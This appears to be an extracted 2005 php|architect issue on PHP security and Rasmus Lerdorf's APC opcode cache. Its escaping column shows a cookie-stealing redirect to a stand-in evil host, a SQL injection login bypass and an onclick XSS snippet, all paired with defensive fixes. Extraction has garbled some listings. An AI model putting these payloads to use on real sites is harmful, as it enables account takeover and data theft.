Tài liệu FOCUS ON SECURITY ppt

pecl_http 0.14.1 • Building absolute URIs • RFC compliant HTTP redirects • RFC compliant HTTP date handling • Parsing of HTTP headers and messages • Caching by “Last-Modified” and/ or ET

Trang 1

VOLUME 4 ISSUE 10

www.phparchitect.com

FOCUS ON SECURITY

PROTECT YOUR WORK FROM SQL INJECTION ATTACKS

Ilia Alshanetsky explains with this exerpt from

php|architect’s Guide to PHP Security

ESCAPE OUTPUT

Handling External Data

Is your work vulnerable to

HTTP RESPONSE SPLITTING?

THE CREATOR OF PHP RASMUS LERDORF

ON

OPTIMIZATION WITH

THE ALTERNATIVE

PHP CACHE

Trang 2

NEXCESS.NET Internet Solutions

SITEWORX control panel

NODEWORX Reseller Access

All of our servers run our in-house developed PHP/MySQL

server control panel: INTERWORX-CP

INTERWORX-CP features include:

- Rigorous spam / virus filtering

- Detailed website usage stats (including realtime metrics)

- Superb file management; WYSIWYG HTML editor

INTERWORX-CP is also available for your dedicated server Just visit

http://interworx.info for more information and to place your order

WHY NEXCESS.NET? WE ARE PHP/MYSQL DEVELOPERS

LIKE YOU AND UNDERSTAND YOUR SUPPORT NEEDS!

ORDER TODAY AND GET 10% OFF ANY WEB HOSTING PACKAGE

VISIT HTTP://NEXCESS.NET/PHPARCH FOR DETAILS

D e d i c a t e d & M a n a g e d D e d i c a t e d s e r v e r s o l u t i o n s a l s o a v a i l a b l e

/mo N EX R ESELL 2 $ 59 95

7500 MB Storage

100 GB TransferUnlimited MySQL DatabasesHost Unlimited DomainsPHP5 / MySQL 4.1.XNODEWORX Reseller Access

/mo

C O N T R O L P A N E L :

php 4

NEW! PHP 5 & MYSQL 4.1.X

PHP4 & MySQL 3.x/4.0.x options also available

We'll install any PHP extension you need! Just ask :)

MONEY BACK GUARANTEE

WITH ANY ANNUAL SIGNUP

4.1.x

3.x/4.0.x

Trang 4

An introduction to PHP’s own opcode cache

Applying PHP to Publishing News

by RUBÉN MARTÍNEZ ÁVILA

Trang 5

Graphics & Layout

php|architect (ISSN 1709-7169) is published

twelve times a year by Marco Tabini & Associates, Inc., P.O Box 54526, 1771 Avenue Road, Toronto,

ON M5M 4N5, Canada

Although all possible care has been placed in assuring the accuracy of the contents of this magazine, including all associated source code, listings and figures, the publisher assumes

no responsibilities with regards of use of the information contained herein or in all associated material.

php|architect, php|a, the php|architect logo, Marco Tabini & Associates, Inc and the Mta Logo are trademarks of Marco Tabini & Associates, Inc.

Contact Information:

General mailbox: info@phparch.com

Editorial: editors@phparch.com

Subscriptions: subs@phparch.com

Sales & advertising: sales@phparch.com

Technical support: support@phparch.com

Reading the Table of Contents, flipping through the pages, or simply

eyeballing the cover of this issue, you will probably notice a certain

theme: security

As I’m sure you’ve read in Security Corner over the past issues,

the problems of poorly architected sites, security-ignorant code, and

general carelessness when it comes to externally-supplied data, are rampant in our

community Failure to abide by a few simple rules (never trust external data; filter

input; escape output; etc.) has left much of the world wide web in a state of

epidemic The main culprits: remote code execution, SQL Injection and Cross Site

Scripting (“XSS”)

I can almost hear some of you thinking “It can’t be THAT bad! How many times

do you have to beat this dead horse?” and I wish you were correct The reality of the

situation is that XSS vulnerabilities (if not the other, more severe problems) can be

found on all but a few elite sites (relatively speaking, from a pool of billions of web

pages, of course)

Still don’t think it’s that bad? Then you should have been at php|works in Toronto,

last month Rasmus (more on him below) gave a keynote talk on PHP Security, and

spent a good chunk of his time explaining the wide dispersion of XSS vulnerabilities

To illustrate his point (perfectly, I might add), he asked his audience to shout out

the names of their favorite Canadian shopping sites, from which he chose a random

site he’d never visited Within 90 seconds, Rasmus had effectively demonstrated an

XSS problem on the site In fact, even the heavy-hitters are not immune: a friend

showed me a simple XSS exploit for Google, as I was writing this editorial Google!

This is the sort of stuff that keeps me awake at night, and one of the reasons

we’re happy to bring you an issue that’s packed full of security-related content We

have the standard Security Corner, with an explanation of HTTP Response Splitting,

and how you can avoid problems in this area We’re also proud to be publishing

a chapter from Ilia Alshanetsky’s recently-released book, php|architect’s Guide to

PHP Security, which is even more packed full of security content Ben continues his

mini-series on security-related tips, focusing on escaping output, with which you

can avoid the dreaded XSS problems on your sites

Security aside (for a moment), we’re extremely excited to feature an article on

APC, the Alternative PHP Cache, written by the creator of PHP, himself, Rasmus

Lerdorf APC has been around for a while, but Rasmus (and his Yahoo! colleagues)

have recently put a considerable amount of work into a largely-reworked major

release of this extension There’s finally a stable opcode cache for PHP 5, and from

a source we can obviously trust, so we know it’s done right A special “thanks” goes

out to Rasmus for writing the piece

FOCUS ON

SECURITY

EDITORIAL

Trang 7

PHP 5.0.5 RC1

php.net announces the release of PHP 5.0.5

RC1.

“This version is a maintenance release

that contains numerous bug fixes, including

security fixes to vulnerabilities found in the

XMLRPC package All users of PHP 5.0 are

encouraged to upgrade to this version.

Some of the changes in PHP 5.0.5

• Changed ming to support official

0.2a and 0.3 library versions.

• Added PHP_INT_MAX and PHP_INT_

SIZE as predefined constants.

• Fixed memory corruption in stristr().

• Many more changes included as well

as several bug fixes.

Get your hands on the latest release at

php.net!

MySQL 5.0

Release Candidate

MySQL announces:

“I’m proud and excited to announce the

first Release Candidate of MySQL 5.0 This

milestone signals that we are nearing what

is certainly the most important release in

MySQL’s history.

MySQL 5.0 has new functionality that I

hope will be welcomed, adopted, and put to productive use by the community of MySQL users—you On the commercial side, MySQL

AB is getting a lot of good vibes from new enterprise customers who are beginning to understand the impact MySQL can have on their IT infrastructure and costs of running mission-critical applications.”

Some of the new ANSI SQL features include:

• Views (both read-only and updatable views)

• Stored Procedures and Stored Functions, using the SQL:2003 syntax, which is also used by IBM’s DB2

• Small bug-fixes in the chatAdvanced example—the error dialog was removed.

• najax.html.importForm (imports an

associative array to the corresponding form elements) and najax.html exportForm (exports form values to

an associative array) were added.

• Support for asynchronous call canceling was added.

Check out the latest release at

http://najax.sourceforge.net/dev/

PHPsh 1.0.1

According to the psychogenic homepage, PHPsh provides ”Simple, web-based shell access to your server.”

“It can be very annoying when you are restricted to FTP access—how can you find out the full path to a directory, or perform

a command line SQL dump when you’re trapped in the limited, chrooted environment provided by an FTP server? PHPsh (PHP shell) allows you to have shell commands run on your behalf by any webserver which serves PHP pages It solves these issues and more, allowing you to tap into the power of any Unix (Linux, BSD, etc.) server!

PHPsh was designed to allow developers, webmasters and sysadmins a quick and easy remedy to those situations in which it would

be so easy to solve a problem or answer a question with shell access but a pointy-haired hosting company thinks shell access is only useful for crackers while simultaneously allowing anyone with FTP access the right to run arbitrary commands through CGI or PHP (doh!).”

http://www.psychogenic.com/en/

products/PHPsh.php.

php|architect Releases New Design Patterns Book

We’re proud to announce the release of php|architect’s Guide to PHP Design Patterns, the latest release in our Nanobook series.

You have probably heard a lot about Design Patterns —a technique that helps you design rock-solid solutions to practical problems that programmers everywhere encounter

in their day-to-day work Even though there has been a lot of buzz, however, no-one has yet come up with a comprehensive resource on design patterns for PHP developers—until today.

Author Jason E Sweat’s book php|architect’s Guide to PHP Design Patterns is the first, comprehensive guide to design patterns designed specifically for the PHP developer This book includes coverage of 16 design patterns with a specific eye to their applications in PHP when building complex web applications, both in PHP 4 and PHP 5 (where appropriate, sample code for both versions of the language is provided).

For more information, http://www.phparch.com/shop_product.php?itemid=96.

Trang 8

Looking for a new PHP Extension?

Check out some of the latest

offerings from PECL.

expect 0.1

This extension allows to interact with

processes through PTYs, using the expect

library.

runkit 0.6

Replace, rename, and remove user defined

functions and classes Define customized

superglobal variables for general purpose

use Execute code in restricted environment

(sandboxing).

pecl_http 0.14.1

• Building absolute URIs

• RFC compliant HTTP redirects

• RFC compliant HTTP date handling

• Parsing of HTTP headers and messages

• Caching by “Last-Modified” and/

or ETag (with ‘on the fly’ option for ETag generation from buffered output)

• Support for sending data/files/

streams with (multiple) ranges

• Negotiating user preferred language/

Xdebug 2.0.0beta4

The Xdebug extension helps you debug your scripts by providing valuable debug information, includin the following:

• stack and function traces in error messages with:

• full parameter display for user defined functions

• function name, file name and line indications

• support for member functions

• memory allocation

• protection for infinite recursions Xdebug also provides:

• profiling information for PHP scripts

• script execution analysis

• capabilities to debug your scripts interactively with a debug client

Check out some of the hottest new

releases from PEAR.

Validate_BE 0.1.1

Package contains locale validation for Belgium

such as:

• Postal Code

• Bank Account Number

• Structured Bank Transfer message

(Nationnal transfer from an bank

account to another)

• VAT

• Natitonal ID

• Identity Card Number (not ready)

• SIS CARD ID (belgian “sécurité

sociale” ID)

HTML_Progress2 2.0.0

This package provides a way to add a fully

customizable loading bar into existing XHTML

documents Your browser should be

DHTML-compatible.

Features:

• create bar (horizontal, vertical),

circle, ellipse and polygon (square,

rectangle) progress meters

• allows usage of existing external

StyleSheet and/or JavaScript

• all elements’ (progress, cells, labels) HTML properties are customizable

• percentage/labels can be placed around the progress meter

• compliant with CSS/XHMTL standards

• integration with template engines is very easy

• implements the Observer design pattern: it is possible to add Listeners

• adds a customizable monitor pattern

to display a progress bar; end-user can abort progress at any time

• allows many progress meters on the same page without uses of an iframes

• error handling system that supports native PEAR_Error, but also PEAR_

ErrorStack, and any other system you might want to plug-in.

• PHP 5 ready

Image_Graph 0.7.0

Image_Graph provides a set of classes that create graphs/plots/charts based on (numerical) data Many different plot types are supported: Bar, line, area, step, impulse, scatter, radar, pie, map, candlestick, band, box & whisker and smoothed line, area and radar plots Graphs are highly customizable,

making it possible to get the exact look and feel that is required

The output is controlled by an Image_ Canvas, which facilitates easy deliver to many different output formats:GD (PNG, JPEG, GIF, WBMP), PDF (using PDFLib), Scalable Vector Graphics (SVG), and others.

Image_Graph is compatible with both PHP 4 and PHP 5.

Image_Canvas 0.2.2

A package providing a common interface

to image drawing, making image rendering library-independent.

Services_Yahoo 0.1.1

Services_Yahoo provides object-oriented interfaces to the web service capabilities of Yahoo!

HTML_AJAX 0.2.1

Provides PHP and JavaScript libraries for performing AJAX (Communication from JavaScript to your server without reloading the page).

Trang 9

Tips & Tricks

ESCAPE OUTPUT

TIPS & TRICKS

by BEN RAMSEY

In the previous three Tips & Tricks columns, I’ve

taken time to fully explain why all input should

be filtered, and I’ve offered tips on how to filter

your data so that the data you work with and

save isn’t considered tainted However,

security-conscious programming doesn’t end with filtering data

Sure, now the data conforms to expectations, but it

may still contain characters that have special meaning

depending on the medium in which your application

chooses to display it That medium may be HTML, SQL,

XML, WML, etc

Thus, we must escape output

What is output? Output is any data that leaves your

application bound for another client or application The

receiving client or application expects the data to be

of a specific format (HTML, SQL, etc.), and that format

may include characters or other information with special

meaning to the receiving client/application The data

being sent, however, might—and probably does—

contain special characters that should not be interpreted

with any special meaning by the receiving client

CODE DIRECTORY: escape

TO DISCUSS THIS ARTICLE VISIT:

so we need to escape them

Escaping is also sometimes referred to as encoding

In short, it is the process of representing data in a way that it will not be executed or interpreted For example, HTML will render the following text in a Web browser as

Filter Input Escape Output You’re hearing an awful lot of this from

me lately, and as one person noted, “It’s great that they’re rubbing this topic in.” Indeed This month’s Tips & Tricks wraps up the recent focus on security with a discussion on escaping output, why it’s

important, and how to do it.

Trang 10

Tips & Tricks

bold-faced text because the tags have special

meaning:

This is bold text.

But, suppose I want to render the tags in the browser

and avoid their interpretation Then, I need to escape

the angle brackets, which have special meaning in HTML

The following illustrates the escaped HTML:

This is bold text.

Why Escape?

So, you run a Web-based

forum, and you don’t

have a problem with users

entering the occasional

HTML tag Why should you

escape your output?

Here’s why: Suppose

this forum allows users to

enter HTML tags That’s fair

enough—you may want

to allow them to enter

bold-faced or italicized

text—but then it outputs

everything in its raw

form—everything So, all

HTML tags get interpreted

by the web browser

What if a user enters

Any subsequent user who is logged into the

forum and visits this page will now be redirected to

http://evil-example.org/steal-cookies.php and

any cookies set by the forum can be stolen

Let’s look at another example Many sites contain

login forms, which usually consist of two fields—a

username and a password When a user enters a username

and password, the application may enter the values into

an SQL statement, as in the following:

$sql = “SELECT * FROM users

WHERE username = ‘{$_POST[‘username’]}’

AND password = ‘{$_POST[‘password’]}’”;

This statement will work just fine as long as a user

enters a proper username and password, but suppose a

user enters something like “example’ OR 1 = 1; ”

as the username? The value of 1 will always equal 1, and since the user properly closed the single quote in the statement, the OR clause will be treated as part of the SQL, and everything after the will be ignored (at least

in most database engines) as a comment Thus, the user

is able to log in without an account

The first step to ensure situations such as these

do not occur is to filter all input to ensure that no unexpected characters appear in the data See the July

2005 through September 2005 issues of php|architect for

my full discussion on input filtering

After filtering, be sure to save the raw data Do not

escape it before storing

If escaped before storing, then it might be necessary

to unescape it at some point in the future For example, what if the data

is escaped for HTML output and stored to a database table only to be retrieved later to output in XML or

to PDF, etc.? Then, it must

be unescaped to transport

to those formats—and possibly escaped again

to accommodate the new output medium This process is bound to introduce more bugs to your code and could likely reduce the quality of the data Thus, to make the most of your data, it is best to save it raw (after filtering) and escape only when outputting.Escaping output is not a terribly difficult process

At the least, it may require the addition of a few extra lines of code, or it may require a little more attention

to detail The important thing to keep in mind is the format outputted and the special characters that need

to be escaped for that format For the purposes of this discussion, I will cover escaping for HTML and SQL, since PHP has excellent built-in functions for handling output

Data may leave your application

in many forms.

Trang 11

Tips & Tricks

that attempt to do something similar by removing all

but a set of allowed tags, but these are not without their

flaws and can potentially introduce some nasty bugs

that are too lenient when outputting data Likewise,

strip_tags() offers the option to allow certain tags

with the format strip_tags($str, ‘ <a> ’);,

but this is also too lenient: attributes are not stripped

from allowed tags, allowing onclick events, etc to

persist in output Take the following code snippet, for

echo strip_tags($str, ‘ <a> ’);

This code will output the following, complete with

the cross-site scripting (XSS) in the onclick attribute:

Bold text

<a href=”#” onclick=”alert(‘XSS’);”>Link</

a>

Rather than completely stripping the tags from

output, a better alternative may be to escape all the tags,

allowing them to render in the output This is an easy

task with htmlspecialchars() and htmlentities()

Both of these functions serve the same purpose: to

convert special characters into their equivalent HTML

entities The main difference is that htmlentities() is

more exhaustive, choosing to convert all characters with

HTML character entity equivalents to their respective

HTML entities Thus, for its exhaustive nature, I will

recommend htmlentites() as the better function to use

to escape HTML output For the above $str example,

htmlentities() returns the following:

In this case, however, allowing the tags may be

preferable, and so we can allow them by first escaping the

output and then converting the selected HTML entities

back to HTML with str_replace():

$str = htmlentities($str);

$str = str_replace(‘’, ‘’, $str);

$str = str_replace(‘’, ‘’, $str);

This will ensure that we send only those special

characters that we desire to have interpreted to the client

While this is a form of unescaping, which I mentioned

earlier is not a desirable process, it is nevertheless a

good alternative to using strip_tags() to allow certain tags, as it will ensure that any tags that contain undesirable attributes are not interpreted by the client

In addition, there is no guesswork involved here; I am not using a regular expression that I could potentially get wrong and, thus, introduce a hole in my application

I will always know what a tag looks like after the angle brackets have been converted to their HTML entity equivalents, so it is easy for me to find and convert the tags back to HTML

Escaping SQL

Similarly, PHP offers excellent built-in functions for escaping SQL statements according to the database engine used For PostgreSQL, there is pg_escape_string() for MySQL, mysql_real_escape_string() and for SQLite,

sqlite_escape_string() If the other native database functions provided in PHP do not offer a similar function, then PHP offers addslashes(), though I would advise that the database’s native escape string function is always a better alternative than addslashes()

Using the SQL example from earlier, we can escape it using mysql_real_escape_string(), as shown in Listing

1, where we first filter it using the filter() function I gave in the August 2005 issue Thus, if a user enters the value “example’ OR 1 = 1; ” as a username, the SQL that is executed will be:

SELECT * FROM users WHERE username = ‘example\’ OR 1 = 1; ‘

AND password = ‘password’

The single quotation mark is escaped and no results are returned because this user doesn’t exist—the user can’t gain access to the application

Some database functions, such as the unified ODBC functions, mysqli, and PDO (in PHP 5.1), use the concept

of prepared statements to prepare and properly escape

an SQL statement Listing 2 illustrates a prepared statements example using PDO The SQL statement that

is created will appear much like the one listed above, but PDO offers added functionality through the optional

bindParam() parameters to define the type and length

of data

Prepared statements also exist in PEAR::DB and other database abstraction classes, but PDO offers much promise since it is built into the language and, thus, much faster with less overhead

So, if possible, use prepared statements (with PDO,

if possible) If they aren’t available, use the database’s built-in escaping function If that isn’t available, then fall back on addslashes() as a last resort

Trang 12

For future installments of Tips & Tricks, I would like to

know what tips and tricks you are using Please send

your tip and/or trick to tnt@benramsey.com, and,

if I use it, you’ll receive a free digital subscription to

php|architect

A Security-Conscious Mindset

The key to secure programming is having a

security-conscious mindset Filtering input and escaping output

is just part of that mindset, but it takes more thought

than simply copying code from elsewhere to introduce

security to an application It takes careful planning and

diligent testing

By now, I hope that you are well on your way to being

a security-conscious programmer I have introduced some

tools and concepts to help you get started, and it is likely

that you have thought of code you’ve already written and

how to improve it using these principles

So, have fun, good luck, and be sure to keep security

at the forefront of a project Security is not a design

feature—it is an essential tool 

1 <?php

2

3 $clean = filter ( $_POST , $post_whitelist );

4

5 $username = mysql_real_escape_string ( $clean [ ‘username’ ]);

6 $password = mysql_real_escape_string ( $clean [ ‘password’ ]);

7

8 $sql = “SELECT * FROM users

9 WHERE username = ‘{$username}’

10 AND password = ‘{$password}’” ;

8 $sql = ‘SELECT * FROM users

9 WHERE username = :username

10 AND password = :password’ ;

Tips & Tricks

BEN RAMSEY is a Technology Manager for Hands On Network

in Atlanta, Georgia He is an author, Principal member of the PHP

Security Consortium, and Zend Certified Engineer Ben lives just north

of Atlanta with his wife Liz and dog Ashley You may contact him at

ramsey@php.net or read his blog at http://benramsey.com/.

Trang 13

An opcode cache works by intercepting the

compile and execute hooks in the Zend engine

and then storing the result of the compilation

phase in a shared memory cache

On subsequent requests to the same file,

a check is done to see if the opcodes corresponding

to the script are in the cache There is also a check to

determine if the file on disk has a modification time

that is newer than the timestamp on the opcodes in the

cache

There are a number of opcode caches available for

PHP They are sometimes referred to as compilers or

accelerators, but I find the term, opcode cache, to be

the most accurate and descriptive term for what they do

Similar packages to APC that are available are ionCube

PHP Accelerator, eAccelerator and Zend Cache Your choice

of cache, I will leave up to you, but at the time of this

writing only APC and Zend Cache had full PHP 5.1 support

and of those two only APC is open source and available

in PECL

Installing APC

There are a number of things you can configure when

you build APC, but you still may be able to install it with

a simple “pear install apc” command (an example

install session can be seen in Listing 1)

I tend to prefer poking around in any PECL extensions

I want to use before I install them, so I install extensions

by checking them out from CVS, and compiling using the

normal phpize + /configure + make + make install

http://forum.phparch.com/258

Adding an opcode cache to your PHP configuration is the

easiest way to speed up your PHP applications without

changing a single line of your code.

Common Configuration Options

The APC configuration directives that I normally place in

my php.ini file can be seen in Listing 3

This setup gives me a 64M single file-backed mapped segment, geared for a server with 500 cacheable files I’ve turned opcode optimization off, because the ABOUT THE AUTHOR:

memory-RASMUS LERDORF is known for having gotten the PHP project off the ground in 1995, the mod_

info Apache module and he can be blamed for the ANSI92 SQL-defying LIMIT clause in mSQL 1.x which has now, at least conceptually, crept into both MySQL and Post-greSQL Prior to joining Yahoo!

as an infrastructure engineer in 2002, he was at a string of companies including Linuxcare, IBM, and Bell Canada working

on Internet technologies

Alternative PHP Cache

Trang 14

apc optimizer is quite unhappy at the moment, and a

relatively low opcode cache time-to-live (ttl) of 30

minutes with a higher user cache ttl of 2 hours

These TTL values are only used in case we start to hit

the top of our 64 megabyte segment If we run out of

memory space, APC scans the cache for opcode and user

cache entries that haven’t been accessed for the number

of seconds denoted in the ttl configuration directive, and

removes them The 500 files hint is just that: a hint

You can easily cache more files than the number you’ve

declared, but it is there to help optimize the hashing

algorithm There is no point in having a hashtable that

contains 10,000 slots, each using a little bit of memory,

if you are never going to have more than 25 files in it An

apc.num_files_hint of 500 actually ends up creating a

hash table with 1000 slots If two files hash to the same

slot the second file gets linked to the first As entries

hash to the same slots, the longer this linked list of

entries becomes, and to fetch these entries, APC has to

walk these linked lists sequentially Therefore having

too few hash slots is also a bad thing The one slight

advantage of having many collisions is that APC does

some very lazy garbage collection as it walks the linked

lists, but this behavior doesn’t outweigh the drawbacks

The apc.mmap_file_mask configuration parameter

is tricky—generally, you would just always use mkstemp

mask as I have shown in Listing 3 It is file-backed,

but the file is unlinked right after the mmap call, which

ensures that the shared memory segment automatically

be cleaned up (removed) when the APC (or APC-hosting)

process exits If, for some reason, you want to force a

real anonymous mmap, you can leave it empty You can

specify /dev/zero to mmap from there, if your OS prefers

that, or if you use something like /apc.shm.XXXXXX it

will use shm_open() instead On Linux, that path has

to be in the root directory, and you must have shmfs

enabled (either compiled into the kernel, or loaded as

a module)

You can also prevent APC from caching certain files

by using the apc.filters configuration directive You

provide either a single regular expression, or a

comma-separated list of regexes that match the full-path

filenames you want to exclude from being cached The

main reason you might want to do this is in

a scenario where you have files that change

extremely rapidly—by this, I mean every second

or two Another circumstance where excluding certain

files from the cache might be beneficial is when your

system consists of literally hundreds of thousands of files,

and you want to force APC to focus on the

performance-critical ones and not have the little-used files potentially

causing your cache to fill up, which slows down garbage

1 10:36pm ubuntu:~> pear install apc

9 Zend Module Api No: 20050617

10 Zend Extension Api No: 220050617

11 Use mmap instead of shmget (usually a good idea) [yes] :

12 Use apxs to set compile flags (if using APC with Apache)?

20 install ok: APC 3.0.6

14 Zend Module Api No: 20050617

15 Zend Extension Api No: 220050617

16 $ /configure enable-apc-mmap \

17 with-php-config=/usr/local/php5/bin/php-config \

18 with-apxs

19 …

20 configure: creating /config.status

21 config.status: creating config.h

22 10:45pm ubuntu:/tmp/pecl/apc> make

23 10:47pm ubuntu:/tmp/pecl/apc> make install

24 Installing shared extensions: /usr/local/php5/lib/php/ extensions/no-debug-non-zts-20050617/

Trang 15

The APC Info Page

In the pecl/apc directory, you will find a script called

apc.php (Figure 1) This file, when executed, gives

you a nice overview of what is in your cache, and how

much of your shared memory segment is being used It

would probably be a good idea to put this script behind

htaccess authentication, if you are going to put it in a

web-accessible directory, but it also has its own

built-in auth system Read the first section of the code built-in

apc.php, itself for more information

Uniquely Identifying Files

A file, whether it is the initial script file, or an included

file, is identified by its device and inode (the file’s

unique position identifier within the filesystem), not its

filename

This method is used, so files can be uniquely identified

in a single stat() call If we were to try to differentiate

files by their filename, we would need the fully qualified

pathname and that can be extremely expensive to get,

since it would involve calling realpath() which, in turn,

calls stat() for every component of the path in order

to resolve any symbolic links that it might discover By

using the file’s inode, we get it down to a single stat call

per file When PHP and APC are nested within an Apache

process, there is no additional stat(), since Apache will

have already made this call, and APC inherits the stat

structure directly from Apache This means that, for PHP

scripts that don’t include anything, APC eliminates all

disk-touching system calls after Apache has handed the

request over to PHP This additional optimization makes

for speedy caching

Updating Files on a Live Web Server

People tend to not pay enough attention to how they

update files on their web server

This is a problem, regardless of the presence of an

opcode cache If you fire up your favourite text editor

and edit a PHP script on your live web server, not

only is there a good chance that you will break your

actual code on the first try, but more importantly, your

editor probably does not write the file to the filesystem

atomically when you are done That means that requests

for the file you are saving may end up getting a partially

written file File writes tend to be pretty fast, so even

on a busy server this should only affect a few requests

However, if you throw an opcode cache into the mix,

you could end up caching this partially written file so

all subsequent requests will get the same partial set of

opcodes from the cache

In order to reduce the impact of this scenario, APC has

an option called file_update_protection This feature

is enabled, and set to 2 seconds by default—meaning that files that have been modified within 2 seconds of the request will not be cached This should prevent any partially written files from polluting the cache

Employing this feature, however, doesn’t fix the real problem—non-atomic file modification on a live web server The correct way to address this issue is to only replace files atomically, by writing to a temp file and then renaming the file to its intended destination filename, or by using automated tools such as rsync, that correctly handle the details of this maneuver, for you UNIX commands and applications such as cp, tar,

vi and emacs often do not create files atomically

Cache Slams

Another often-overlooked issue occurs when files on a very busy server are changed

Imagine a server whose front page gets hit hundreds

of times per second When you modify that front page file, many requests will see that the cached opcodes are now stale and will attempt to compile and cache the script from disk APC doesn’t really mind this, as it is smart enough to avoid any sort of race conditions during the compile and cache procedure, so you will never end

up with an inconsistent cache However, each request that tries to cache a script starts allocating memory in the cache at the same time Once all the small chunks of memory have been allocated and populated correctly, the cache entry gets activated atomically and any previous entries for the same file gets put on a deleted list and deleted when everyone is done accessing it This means that modifying files on a busy server can lead

to many simultaneous memory allocations and you could potentially fill up your shared memory segment because

of multiple concurrent requests all attempting to cache the same file, at approximately the same time

APC attempts to reduce the negative effects of this situation, with a slam_defense option that can be set to a percentage between 0 and 100 that indicates the likelihood that a request that hits an uncached file will skip trying to cache it Very much like the

file_update_protection setting, this is a mechanism

to ease the pain of something that really should be handled differently, by the user (the person who deploys the changed file, in this case) You can completely eliminate both the partial update and the cache slam problems by writing to a temporary file first; then, load that temporary file once, through your webserver (and thus, APC), to force it to be cached, and then rename the file to its final destination You might expect that the file would be re-cached once its name is changed,

Trang 16

but recall that APC uses the device and inode of the file,

not its name to uniquely identify it When you rename a

file, the inode doesn’t change, nor does the modification

time

Userspace Access to the Cache

There are a couple of ways to make use of the cache from

your userspace PHP scripts

The first way is to poke it for information about what

it is doing The apc.php script that comes with APC is

an example of how to use the apc_cache_info() and

apc_sma_info() functions These return an array that

contains information about objects stored in the cache

and the amount of memory that each of these objects is

using apc_clear_cache() lets you remove all entries

from the cache, without needing to restart your server

Normally you wouldn’t need to call this function

The apc_store() and apc_fetch() functions are

much more interesting These allow you to store your

own data in the cache Generally, you will want to use

these functions for relatively small amounts of data that

is used repeatedly, and is expensive to generate For

example, you might have an XML-based configuration

file for your application People have tended to shy away

from this in the past, but with the simplexml extension

in PHP 5, it is extremely easy to write a parser, and with APC storing the parsed config array, it is also blazingly fast Take this sample config file:

This should be mostly self-explanatory: Load the XML file using simplexml, loop through each section and use the

$entry[‘name’] shortcut for picking the name attribute

FIGURE 1

Trang 17

out of the entry, and make this name the key for each

section sub-array Then, since below each section in our

example, we just have flat XML with no attributes, nor

sub-nodes, we can just cast it directly to an array and

stick the data directly into our $config array If you have

a completely flat XML config file, you could just cast

$xml directly to an array and you are done, but usually

configuration files are slightly more complex, and you

need to decide how to deal with attributes and what you

want your final array to look like The above three lines

give us an array like this:

Now we can add apc_store()/apc_fetch() caching

and our entire xml-based parsing and caching solution

You may want to add a bit of error checking to make

sure that the conf.xml file actually exists, and if you

are going to do that, it means a stat() call You might

as well make use of that extra system call and pull in

the modification time, using filemtime() So, our final

approach would look like this:

Now we can change our conf.xml file all we want, and it

will be reparsed on the request that immediately follows

the change, and cached in shared memory between

changes apc_store() takes a third optional argument,

which is the number of seconds to cache the passed

data This makes it easy to use the store/fetch method for caching remote data where you want to fetch a new version every 30 minutes, for example

Real world Performance Numbers

Let’s look at 4 examples of what you can expect when you add APC to your system

First a common photo album application: Gallery (version 1) With no opcode cache, hitting a page of an album in Gallery with 9 photos on it, yields just over

9 requests per second That’s not very fast Although, looking at it a different way, it is about 800,000 requests/day Of course, that is just for the HTML for that album page and doesn’t include all of the extra requests needed

to fetch each thumbnail and whatever other images are

on there Still, it is probably more than fast enough for your family album But, faster is always better Adding APC gets us up to 30 requests/second, without changing

a single line of code At these speeds, you do notice

a difference An application that normally attains 30 requests/second, versus one that puts out 10 requests/second, feels snappier Or turn it around: 33ms to finish

a request vs 110ms

With a slight tweak, we can bring this up to about 32 requests/second Not much of an improvement The low-hanging fruit is usually the configuration information for

an application like this Unfortunately, Gallery stores its config in nested classes that will need to be serialized and unserialized Improving on this makes Gallery a bit faster, but probably not worth the maintenance headache

of having locally modified files It is just a couple of lines in Gallery’s config.php file, though At the top:

if($tmp = apc_fetch(‘gallery’)) { $gallery=unserialize($tmp);

if(!$config=apc_fetch(‘config’)) include ‘config inc’;

And, of course, at the bottom of config.inc you would need to add:

apc_tore(‘config’,$config);

Trang 18

This serialization of objects will be done by APC,

internally, soon so it will go a bit faster by eliminating

the extra userspace unserialize call, but it will still be

nowhere near as fast as using an array that gets copied

directly out of shared memory

FUDforum-2.6 is a popular bulletin board application

Without APC, viewing a message thread with a couple

of messages in it gets me 46 requests/second Turning

on APC brings that up to 160 requests/second Looking

at FUDforum’s config system, it (unfortunately) uses a

bunch of global variables in a file called GLOBALS.php

This file also includes a bunch of other things, and it is

included from all over, so it isn’t easy to eliminate the

include call, nor is it easy to cache the actual config

variables But it can be done At the top of GLOBALS.php

The main performance problem here is the need to do

the extract() In the end, this slows us down to about

153 requests/second If there was heavier logic and

perhaps an SQL query or some XML parsing involved in

creating the list of variables, then this approach would

have helped

Serendipity—also known as s9y—is an application

for people who want to host their own weblogs I get

10 requests/second on a plain PHP installation, and

37 requests/second after adding APC Although the

configuration system is array-based, there is plenty of

logic intertwined, so it is also difficult to cache this

information in s9y

Finally, let’s look at a code snippet written with APC

in mind I recently needed a flexible and fast RSS/Atom

feed reader It uses simplexml and a couple of PHP5.1

tricks to reduce the RSS or Atom XML data down into

an easily cacheable array The code is a bit long to

include here, but fire up a browser and have a look at it–

http://lerdorf.com/simple_rss.phps The inline comments

should help make sense of the code It is basically just a

complicated example of the XML-based config file parser

we developed earlier, but now, we get some numbers

You will notice there are two levels of caching

It caches the parsed XML to shared memory with

apc_store() and it also caches the downloaded raw XML

to disk I tend to do this because I have multiple things

reading these various XML files and they sometimes have

different ideas of what is interesting in them This way I can have different parsers that parse the disk-cached XML into their own shared memory slots, but don’t need to hit the backend server for each separate application On my

lerdorf.com server I have http://buzz.progphp.com,

http://flickr.progphp.com and http://lerdorf.com itself all wanting to access some of the same XML files in very different ways

Now, for the numbers: I am using my RSS2 feed from http://toys.lerdorf.com as the sample XML file Without any caching at all—not even disk-based raw XML caching—I get about 25 requests per second But that number is very variable, depending on the amount

of traffic on the remote server, and general network latency issues It is clear that fetching the entire remote 76kB XML file on every request is not a smart thing

to do Simply caching the XML data between requests brings that number way up to 165 requests per second Finally, and most dramatically, adding apc_store() and

apc_fetch() takes us to 550 requests/second This brings us to the point where getting a 76kB XML feed into an easily walkable array is basically free, from a performance perspective That’s less than 2ms per end-to-end request on a rather low-end 1.8GHz Athlon box with IDE drives, running Ubuntu Linux, and an untuned default Apache install Turning off Keepalive, and changing MaxRequestsPerChild from its default 100 to

0 (unlimited), brings that number up to 590 requests per second

Conclusion: Speed is Good!

Opcode caching plus injecting user caching in the right places in your application can result in dramatic performance gains

In my RSS example, I went from 25 requests/second

